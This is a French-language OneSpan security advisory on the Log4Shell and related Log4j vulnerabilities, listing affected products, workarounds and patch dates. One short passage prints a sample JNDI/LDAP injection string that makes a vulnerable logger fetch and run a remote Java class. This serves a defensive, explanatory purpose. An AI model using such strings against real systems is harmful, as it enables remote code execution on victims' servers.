Vulnérabilités d'exécution de code à distance dans le composant Log4j2 des produits OneSpan

This page is only available in English

ID de l'avis onespan-sa-20211213-log4j

Numéro de révision: 1.10

Date et heure de publication : 13 décembre 2021 23:00 UTC

Date et heure dela dernière mise à jour : 17 janvier 2022 17:00 UTC

Résumé

Le 9 décembre 2021, la Fondation Apache a publié une mise à jour d'urgence pour une vulnérabilité critique de type "zero-day" dans Log4j, un outil de journalisation largement utilisé et inclus dans de nombreuses applications Java. Le problème a été nommé Log4Shell et a reçu l'identifiant CVE-2021-44228. La vulnérabilité tourne autour d'un bogue dans la bibliothèque Log4j qui peut permettre à un attaquant d'exécuter un code arbitraire sur un système qui utilise Log4j pour écrire des messages de journalisation. Cette vulnérabilité affecte la version 2 de Log4j, et plus particulièrement toutes les versions de 2.0-beta-9 à 2.15.0.

Au cours des semaines qui ont suivi la divulgation de la vulnérabilité initiale CVE-2021-44228, la Fondation Apache a signalé plusieurs autres vulnérabilités connexes dans Log4j :

  • La vulnérabilité CVE-2021-45046 permet de réaliser une attaque par exécution de code à distance contre Log4j2 si Log4j utilise un Pattern Layout non-défini, un Thread Context Map pour l'étiquetage des poissons, et permet à l'utilisateur de spécifier des données d'entrée pour le Thread Context Map. Ce problème affecte toutes les versions de 2.0-beta-9 à 2.15.0. Elle est corrigée dans les versions 2.16.0 et 2.12.2.
  • La vulnérabilité CVE-2021-45105 permet d'effectuer une attaque par déni de service contre Log4j2 si Log4j utilise un Pattern Layout non-défini, un Thread Context Map pour l'étiquetage des poissons, et permet à l'utilisateur de spécifier des données d'entrée pour le Thread Context Map. Ce problème affecte toutes les versions de 2.0-alpha1 à 2.16.0 (à l'exception de 2.12.3). Elle est corrigée dans les versions 2.17.0 et 2.12.3.
  • La vulnérabilité CVE-2021-44832 permet de réaliser une attaque par exécution de code à distance contre Log4j2 si l'adversaire peut modifier la configuration de Log4j. Elle affecte toutes les versions de 2.0-beta7 à 2.17.0 (à l'exception de 2.3.2 et 2.12.4). Elle est corrigée dans les versions 2.17.1, 2.12.4 et 2.3.2.
  • Enfin, la vulnérabilité CVE-2021-4104 affecte Log4j 1.2, s'il est configuré pour utiliser JMSAppender, ce qui n'est pas le cas par défaut.

Cet avis de sécurité contient des informations sur le risque de sécurité que les vulnérabilités de Log4j présentent pour les produits SaaS et sur site de OneSpan, fournit des informations sur les mesures compensatoires pertinentes pour les clients sur site, et fournit des informations sur la disponibilité des correctifs.

Description détaillée de la vulnérabilité CVE-2021-44228

La vulnérabilité CVE-2021-44228 exploite l'interface Java Naming and Directory Interface (JNDI), qui fournit une interface abstraite pour différents services de résolution de noms et d'annuaire, tels que DNS et LDAP.

La vulnérabilité existe dans Log4j parce que le logiciel concerné ne valide pas suffisamment les entrées fournies par l'utilisateur, ce qui permet potentiellement à un attaquant de fournir une chaîne de caractères qui est interprétée comme une variable qui, lorsqu'elle est développée, entraîne le chargement et l'invocation d'un fichier de classe Java distant.

L'exemple suivant démontre la méthode par laquelle cette condition peut être déclenchée en enregistrant comme message d'erreur des données spécialement conçues et fournies par l'attaquant.

UserData = "${jndi:ldap://[host]/[path]}" ;
logger.error(UserData) ;

Pour compromettre la cible, l'URL JNDI/LDAP sert un objet de classe Java malveillant qui sera désérialisé et invoqué sur l'hôte victime, où la bibliothèque Log4j est disponible. Cette action est possible parce que JNDI n'applique aucun contrôle de sécurité aux requêtes LDAP. De plus, LDAP, contrairement aux autres protocoles JNDI, supporte le chargement de classes à partir de ressources distantes.

Pour exploiter cette vulnérabilité, un attaquant doit envoyer une requête qui soumet une entrée malveillante au système ciblé, ce qui rend l'exploitation plus difficile dans les environnements qui restreignent l'accès au réseau à partir de sources non fiables.

Évaluation des risques liés aux produits et solutions de OneSpan

1) Solutions SaaS de OneSpan

OneSpan Sign Production et Sandbox

La version SaaS de OneSpan Sign est équipée d'un pare-feu d'application Web (WAF) qui inspecte tout le trafic Web entrant. Nous avons configuré le WAF pour détecter et bloquer les tentatives d'exploitation des vulnérabilités de la bibliothèque Log4j. Nous avons mis à niveau la bibliothèque Log4j vers la version 2.16 avec le déploiement de OneSpan Sign version 11.45.2(notes de mise à jour) dans tous les environnements de production afin d'atténuer la vulnérabilité. Nous avons confirmé que les CVE-2021-45105 et CVE-2021-4104 ne s'appliquent pas à notre configuration. Nous prévoyons de passer à Log4j 2.17.1 dans la prochaine version majeure (11.46). Nous communiquerons les mises à jour via notre Trust Center.

Environnement FedRAMP de OneSpan Sign

Cet environnement est équipé de Web Application Proxies (WAP), qui effectuent une pré-authentification de la plupart des demandes adressées à OneSpan Sign. Nous avons mis à jour la bibliothèque Log4j à la version 2.16 avec le déploiement de OneSpan Sign version 11.45.2(notes de mise à jour) dans l'environnement FedRAMP pour atténuer la vulnérabilité. Nous avons confirmé que les CVE-2021-45105 et CVE-2021-4104 ne s'appliquent pas à notre configuration. Nous prévoyons de passer à Log4j 2.17.1 dans la prochaine version majeure (11.46).

OneSpan Cloud Authentication (OCA) et Intelligent Adaptive Authentication (IAA) basés sur la plateforme Trusted Identity (TID)

Les environnements de mise en scène/production d'OCA et d'IAA sont protégés par une liste blanche d'adresses IP et une sécurité de couche de transport (TLS) avec authentification TLS mutuelle. Ainsi, seuls les clients authentifiés peuvent accéder aux applications web et aux API de ces solutions.

Les adversaires ne peuvent pas accéder aux environnements Sandbox de l'OCA et de l'IAA sans créer un compte sur le portail communautaire de OneSpan. OneSpan estime actuellement que le risque d'exploitation par des adversaires non autorisés est faible. Nous avons mis à jour l'environnement Sandbox vers Log4j 2.17.0 le 23 décembre 2021, l'environnement Staging le 14 janvier 2022 et l'environnement Production le 17 janvier 2022. Nous avons confirmé que la CVE-2021-4104 ne s'applique pas à notre configuration. Nous prévoyons de mettre à jour les environnements Sandbox et Staging/Production vers Log4j 2.17.1 dans la prochaine version majeure. En parallèle, nous prévoyons de mettre à jour nos bibliothèques en production dès que possible afin d'atténuer la vulnérabilité de sécurité. Nous communiquerons les mises à jour via notre Trust Center.

Solutions de vérification d'identité (IDV) de OneSpan et DealFlo v2

DealFlo v2 n'utilise pas la bibliothèque Log4j et n'est donc pas concerné par cette vulnérabilité.

L'environnement de production d'IDV est protégé par une authentification basée sur des jetons d'accès. Ainsi, seuls les clients authentifiés peuvent accéder aux applications web et aux API de ces solutions. Nous avons mis à jour la configuration du système pour Log4j tel qu'il est utilisé dans l'IDV afin d'atténuer la vulnérabilité. Parallèlement, nous mettons à jour les bibliothèques Log4j vers la version 2.17.1 afin d'atténuer les vulnérabilités de sécurité. Ces mises à jour seront déployées dans la version R5 le 19 janvier 2022. Nous communiquerons les mises à jour via notre Trust Center.

Portail Application Shielding

Le portail Application Shielding n'utilise pas la bibliothèque Log4j et n'est donc pas concerné par cette vulnérabilité.

2) Produits serveur OneSpan sur site

Serveur d'authentification Framework

Authentication Server Framework n'utilise pas la bibliothèque Log4j et n'est donc pas concerné par cette vulnérabilité.

Serveur d'authentification

Un composant du produit Authentication Server (versions 3.15.0 à 3.22.0) utilise la bibliothèque Log4j 2.x. Nous avons développé des instructions détaillées qui expliquent aux clients comment mettre en œuvre une solution de contournement pour atténuer la vulnérabilité. Un correctif basé sur Log4j 2.17.0 a été publié le 21 décembre. Nous prévoyons de passer à Log4j 2.17.1 lors d'une prochaine mise à jour.

Serveur d'authentification Appliance

Un composant du produit Authentication Server Appliance (versions 3.12.13.0 à 3.21.0) utilise la bibliothèque Log4j 2.x. Nous avons développé et publié un correctif pour ces versions du produit. Nous avons confirmé que les CVE-2021-45046, CVE-2021-45105, CVE-2021-44832 et CVE-2021-4104 ne s'appliquent pas à l'appliance.

Passerelle Digipass

Un composant du produit Digipass Gateway (versions 5.0 et supérieures) utilise la bibliothèque Log4j 2.x. Nous avons développé des instructions détaillées qui expliquent aux clients comment mettre en œuvre une solution de contournement pour atténuer la vulnérabilité. Un correctif basé sur Log4j 2.17.0 a été publié le 21 décembre. Nous prévoyons de passer à Log4j 2.17.1 lors d'une prochaine mise à jour.

Analyse des risques

Un composant du produit Risk Analytics utilise la bibliothèque Log4j 1.x. Cette bibliothèque n'est pas affectée par le problème. Cette bibliothèque n'est pas affectée par la vulnérabilité. Toutefois, si les clients modifient la configuration de la bibliothèque de manière à ce qu'elle prenne en charge les consultations JNDI, elle pourrait devenir vulnérable. Nous recommandons aux clients de revoir leur configuration Log4j et de vérifier qu'elle n'active pas les consultations JNDI via l'utilisation de la classe Java JMSAppender. OneSpan mettra à jour la bibliothèque Log4j dans une prochaine version de Risk Analytics.

Digipass Native Bridge

Digipass Native Bridge n'utilise pas la bibliothèque Log4j et n'est donc pas concerné par cette vulnérabilité.

OneSpan Sign

Les composants du produit OneSpan Sign utilisent la bibliothèque Log4j 2.x. OneSpan mettra à jour la bibliothèque Log4j dans une prochaine version de OneSpan Sign.

Certaines versions de OneSpan Sign utilisent la bibliothèque Log4j 1.x. Cette bibliothèque n'est pas affectée par la vulnérabilité. Cependant, si les clients modifient la configuration de la bibliothèque afin qu'elle prenne en charge les consultations JNDI, elle pourrait devenir vulnérable. Nous recommandons aux clients de revoir leur configuration Log4j et de vérifier qu'elle n'active pas les consultations JNDI via l'utilisation de la classe Java JMSAppender. OneSpan mettra à jour la bibliothèque Log4j dans une prochaine version de OneSpan Sign.

Conseils généraux

OneSpan recommande à ses clients de limiter autant que possible l'accès aux composants des produits sur site (par exemple, les composants d'administration Web, les API).

Si le produit est accessible au public, nous recommandons aux clients de

  1. Configurer leur Web Application Firewall (WAF), s'il est utilisé, pour bloquer les tentatives d'exploitation de la vulnérabilité. Les clients doivent contacter leur fournisseur de WAF pour recevoir des règles WAF afin de bloquer les tentatives d'exploitation des vulnérabilités Log4j.
  2. Atténuez la vulnérabilité en configurant la bibliothèque Log4j comme suit :
    1. Pour Log4j 2.10 ou supérieur dans la configuration par défaut : Désactivez les consultations en définissant la propriété système LOG4J_FORMAT_MSG_NO_LOOKUPS à true, ou en définissant une variable d'environnement Dlog4j.formatMsgNoLookups=true
    2. b) Pour toutes les versions de Log4j2 : Supprimez JdniLookup (et les classes de support telles que JndiManager, JMSAppender, SMTPAppender) du jar log4j-core.

3) Produits d'authentification OneSpan Digipass

Les produits Digipass suivants utilisent une version affectée de la bibliothèque Log4j2 :

  • Mobile Security Suite (MSS) Notification SDK Server
  • Exemple de code du serveur Mobile Authenticator Studio (MAS)
  • Exemple de code du serveur Application Shielding

OneSpan a publié un correctif pour Mobile Security Suite basé sur Log4j 2.15.0 le 14 décembre 2021, a publié un autre correctif basé sur Log4j 2.16.0 le 16 décembre 2021. Nous avons publié un autre correctif basé sur Log4j 2.17.0 le 21 décembre.

Nous recommandons aux clients qui utilisent les échantillons de serveurs pour MAS et Application Shielding de ne pas utiliser la bibliothèque Log4j vulnérable.

Gestion des fournisseurs

OneSpan s'est engagé auprès de ses fournisseurs et partenaires qui contribuent à la livraison et au support de ses produits et solutions afin de comprendre leur exposition aux vulnérabilités et les mesures qu'ils prennent pour atténuer la vulnérabilité, le cas échéant.

Corrections et solutions de contournement

OneSpan travaille activement sur des versions ponctuelles de produits afin de mettre à jour la bibliothèque concernée et publiera des correctifs pour les lignes de produits suivantes :

1) Produits SaaS

Ligne de produit Version Date de disponibilité
OneSpan Sign 11.45.2 15-18 décembre 2021
OneSpan Sign FedRAMP 11.45.2 15-18 décembre 2021
OneSpan Cloud Authentication (OCA) et Intelligent Adaptive Authentication (IAA)

Bac à sable


Phase d'essai

Production

23 décembre 2021

14 janvier 2022

17 janvier 2022

Vérification de l'identité (IDV)

Atténuation par la configuration

Mise à jour de la version R5

15-18 décembre 2021


19 janvier 2022

2) Produits sur site

Ligne de produits Version Date de disponibilité
Serveur d'authentification Correctifs 3.15 - 3.22 21 décembre 2021
Appliance d'authentification Correctif 3.12.13.0 - 3.21.0 15 décembre 2021
Passerelle Digipass Correctif 5.0 - 5.5 21 décembre 2021
Analyse des risques Sera annoncé prochainement Sera annoncé prochainement
Signe OneSpan Sera annoncé prochainement Sera annoncé prochainement
Mobile Security Suite 4.31.3 21 décembre 2021

Des correctifs pour les échantillons de serveurs de Mobile Authenticator Studio (MAS) et Application Shielding seront fournis dans le cadre de la prochaine version programmée.

Obtenir des versions de produits avec correctifs

Les clients disposant d'un contrat de maintenance peuvent obtenir des versions de produits corrigées à partir du portail client. Les clients qui n'ont pas de contrat de maintenance doivent contacter leur représentant local.

Références

[1] https://logging.apache.org/log4j/2.x/security.html
[2] https://nvd.nist.gov/vuln/detail/CVE-2021-44228
[3] https://nvd.nist.gov/vuln/detail/CVE-2021-45046
[ 4 ] https://nvd.nist.gov/vuln/detail/CVE-2021-45105
[5] https://nvd.nist.gov/vuln/detail/CVE-2021-44832


Clause de non-responsabilité

BIEN QUE TOUS LES EFFORTS RAISONNABLES SOIENT DÉPLOYÉS POUR TRAITER ET FOURNIR DES INFORMATIONS EXACTES, L'ENSEMBLE DU CONTENU ET DES INFORMATIONS DE CE DOCUMENT SONT FOURNIS "EN L'ÉTAT" ET "TELS QUE DISPONIBLES", SANS AUCUNE REPRÉSENTATION OU APPROBATION ET SANS AUCUNE GARANTIE EXPRESSE OU IMPLICITE D'ACTUALITÉ, D'EXHAUSTIVITÉ OU D'ADÉQUATION, NI AUCUNE GARANTIE, Y COMPRIS LES GARANTIES DE QUALITÉ MARCHANDE OU D'ADÉQUATION À UN USAGE OU À UN BUT PARTICULIER. L'UTILISATION DE CE DOCUMENT, DE TOUTE INFORMATION FOURNIE OU DE TOUT MATÉRIEL LIÉ À CE DOCUMENT SE FAIT À VOS PROPRES RISQUES. ONESPAN SE RÉSERVE LE DROIT DE MODIFIER OU DE METTRE À JOUR LES INFORMATIONS CONTENUES DANS CE DOCUMENT À TOUT MOMENT ET À SA DISCRÉTION, AU FUR ET À MESURE QUE DE NOUVELLES INFORMATIONS OU DES INFORMATIONS COMPLÉMENTAIRES DEVIENNENT DISPONIBLES.

Copyright © 2021 OneSpan North America, Inc. Tous droits réservés.

Téléchargez la version PDF